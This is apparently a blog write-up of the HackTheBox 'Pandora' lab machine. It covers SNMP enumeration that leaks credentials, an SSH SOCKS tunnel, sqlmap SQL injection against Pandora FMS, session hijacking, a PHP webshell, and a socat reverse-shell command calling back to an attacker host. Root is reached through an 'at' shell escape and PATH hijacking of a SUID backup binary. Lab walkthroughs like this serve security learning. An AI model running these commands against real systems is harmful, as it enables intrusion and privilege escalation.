Posts HackTheBox - Pandora
Post
Cancel

HackTheBox - Pandora

Pandora


Probably the hardest “easy” box i have done yet. Pandora makes use of a dynamic tunnel via SSH, which creates a proxy to view the hosted webpage. Pandora let me explore new tools, such as proxychains, allowing me to tunnel commands via proxy, and snmpwalk for enumerating snmp.

Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root💀NTAKali)-[~/Desktop]
└─# nmap 10.10.11.136 -sV -sC -Pn -T 5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-08 15:35 GMT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.136
Host is up (0.073s latency).
Not shown: 919 closed tcp ports (reset), 79 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.16 seconds

Port 80 is hosting a website called “Play”, an extension of panda.htb. Lets add this to our hosts file echo 10.10.11.136 panda.htb >> /etc/hosts

After looking through the website, i decided to see if the contact form had any vulnerabilities, but i seemed to hit a dead end so decided to search elsewhere.

UDP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root💀NTAKali)-[~/Desktop]
└─# nmap -sU --top-ports=20 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-09 10:18 GMT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.15s latency).

PORT      STATE  SERVICE
53/udp    closed domain
67/udp    closed dhcps
68/udp    closed dhcpc
69/udp    closed tftp
123/udp   closed ntp
135/udp   closed msrpc
137/udp   closed netbios-ns
138/udp   closed netbios-dgm
139/udp   closed netbios-ssn
161/udp   open   snmp
162/udp   closed snmptrap
445/udp   closed microsoft-ds
500/udp   closed isakmp
514/udp   closed syslog
520/udp   closed route
631/udp   closed ipp
1434/udp  closed ms-sql-m
1900/udp  closed upnp
4500/udp  closed nat-t-ike
49152/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 15.58 seconds

With no success with the site on port 80, i decided to also do a UDP scan of the top 20 UDP ports. The scan showed port 161 open with snmp. Lets try and enumerate this further with nmap -sU -p 161 -sV -sC

└─# nmap -sU -sV -sC -p 161 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-09 10:22 GMT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.086s latency).

Bug in snmp-win32-software: no string output.
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 1d21h25m23s
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 1d21h25m24.02s (16352402 timeticks)
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  10.10.11.136:38132   1.1.1.1:53
|   TCP  10.10.11.136:50496   10.10.14.8:1234
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.53:53        0.0.0.0:0
|   UDP  0.0.0.0:161          *:*
|_  UDP  127.0.0.53:53        *:*
| snmp-processes: 
|   1: 
|   2: 
|   3: 
|   4: 
|   6: 
|   9: 
|   10: 
|   11: 
|   12: 
|   13: 
|   14: 
|   15: 
|   16: 
|   17: 
|   18: 
|   20: 
|   21: 
|   22: 
|   23: 
|   24: 
|   25: 
|   26: 
|   27: 
|   28: 
|_  29: 
Service Info: Host: pandora

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.06 seconds

The host is running SNMPv1, which is the oldest and original version of the SNMP protocol. SNMPv1’s biggest flaw is its use of a clear-text community string, which can be used to enumerate devices and information that otherwise should be encyrpted.

From the nmap scan, we can also see the community string public, and so we can use this to enumerate further, using snmpwalk.

SNMP

We can use the following command to enumerate SNMP snmpwalk -c public -v1 <IP>

Where -c sets the community string, in this case public, and -v1 sets the version to SNMPv1.

1
2
3
4
5
6
7
8
9
10
11
iso.3.6.1.2.1.25.4.2.1.5.873 = ""
iso.3.6.1.2.1.25.4.2.1.5.934 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.954 = ""
iso.3.6.1.2.1.25.4.2.1.5.971 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1098 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.27536 = ""
iso.3.6.1.2.1.25.4.2.1.5.33650 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.33652 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.34191 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.34210 = STRING: "-k start"

Near the bottom of the results, we can see what looks like credentials for user daniel, with the password HotelBabylon23.

We can use these to log into the system with SSH, as port 22 is open.

Foothold

Once SSH’d in daniels account, i looked for the user.txt flag, which is in the /matt directory. When attempting to access it, i am denied. Thus i must attempt to pivot into user matt.

1
2
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied

Pivoting

Looking in the /var/www directory, i can see two directories, html and pandora. html is visible and accessible from a public host, but pandora is not. If i look at the /etc/hosts file on the system, we can see they have it setup this way:

1
2
3
4
5
6
7
8
9
10
daniel@pandora:~$ cat /etc/hosts
127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb
127.0.1.1 pandora

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Assuming localhost.localdomain will allow access into the pandora directory, we can setup a dynamic tunnel using SSH. ssh -D 9999 daniel@panda.htb

When can then setup a proxy using FoxyProxy, using SOCKS5, which supports DNS resolution, to resolve the webpage on localhost.localdomain. foxyproxy

From here we are greeted with the following Pandora FMS webpage:

FMS

Attempting to login with daniels credentials results in an error message saying only "User can only access API." From here i started to do some googling, which lead me to this website:

https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

This website details different vulnerabilities with Pandora FMS, but what stood out to me was the unauthenticaed SQL injection associated with **chart_generator.php** and session_id. I checked whether the chart_generator_php was there, and it was, but the error message “ACCESS IS NOT GRANTED” appeared.

ProxyChains

Knowing that i can access the vulnerable page, i will using sqlmap via proxychains. ProxyChains is a tool that forces any TCP connection made by any given application to go through proxies. Essentially, you can use ProxyChains to run any program through a proxy server.

First thing is to add the proxy we created to the proxy chains config. socks5 127.0.0.1 9999 daniel HotelBabylon23

1
2
3
4
5
6
7
8
pico /etc/proxychains4.conf

[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
#socks4    127.0.0.1 9050
socks5 127.0.0.1 9999 daniel HotelBabylon23

I can now use sqlmap with proxychains on the Pandora FMS.

proxychains sqlmap -u http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id= --dbs

[21:21:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[21:21:12] [INFO] fetching database names
[proxychains] Strict chain  ...  127.0.0.1:9999  ...  localhost.localdomain:80  ...  OK
[21:21:12] [WARNING] reflective value(s) found and filtering out
[proxychains] Strict chain  ...  127.0.0.1:9999  ...  localhost.localdomain:80  ...  OK
[21:21:13] [INFO] retrieved: 'information_schema'
[proxychains] Strict chain  ...  127.0.0.1:9999  ...  localhost.localdomain:80  ...  OK
[21:21:13] [INFO] retrieved: 'pandora'
available databases [2]:
[*] information_schema
[*] pandora

After enumering through the pandora database, i found 2 interesting tables, tpassword_history and tsessions_php.

Dumping the password history table gave me the md5 hashed passwords of Matt and Daniel.

Dumping the sessions_php table gave me session id’s for both matt and daniel.

Awesome, now i can use Matts session_id cookie and login to his account.

Unfortunately, Matt is not an admin. However, using the following SQL injection line from sqlpwn.py gave me the admin cookie, to elevate to admin.

https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/blob/master/sqlpwn.py


### Webshell
Now i am able to upload files via the admin file manager.
![](/assets/img/Icons/Pandora/fileupload.png)

After trying to upload a php reverse shell and getting no luck, i decided to upload a php webshell.

![](/assets/img/Icons/Pandora/phpwebshell.png)

From here, i attempted to get a reverse shell with socat, which allows full TTY over shells. 
###### Host
`socat file:tty,raw,echo=0 tcp-listen:4445`
######  Web Shell
`socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:<PORT>`

We have a reverse shell, nice!

## User
Moving to the matt directory, i can now access the user flag.
<pre>
matt@pandora:/home/matt$ cat user.txt 
*30***b8557f5**be1160c*4be67c***
</pre>

## Priviledge Esculation
After some looking around, i noticed that i was in some sort of restricted environment. When typing `sudo`, i was presented with the following weird error message.
<pre>
matt@pandora:/home/matt$ sudo
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
</pre>

From here, i looked for SUID binaries.
`find / -perm -u=s -type f 2>/dev/null`

<pre>
matt@pandora:/home/matt$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
</pre>

I checked some binaries on GTFObins, and found a possible shell escape using the `/usr/bin/at` binary.

echo “/bin/sh <$(tty) >$(tty) 2>$(tty)” | at now; tail -f /dev/null

1
2
3
4
5
6
7
8
9
10
11
Now when typing sudo, i am met with the normal functionality.

Another insteresting binary was  `pandora_backup`. I downloaded it to my host machine, and run `strings` to see if there is any useful information i can see.

```bash
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!

It looks as though the tar command it used to compress files in the root directory. However i noticed the call to tar does not use the full path, and so i can change to $PATH to a custom tar executable, possibly allowing for priviledge esculation.

1
2
3
4
5
cd /tmp
echo "/bin/bash" > tar
chmod +777 tar
export PATH:/tmp:$PATH
pandora_backup

After running, we gained root access and can get the last flag in the root directory.

Root

root@pandora:/root# cat root.txt 
**111*884f**818dfc628***4e5f*30d
This post is licensed under CC BY 4.0 by the author.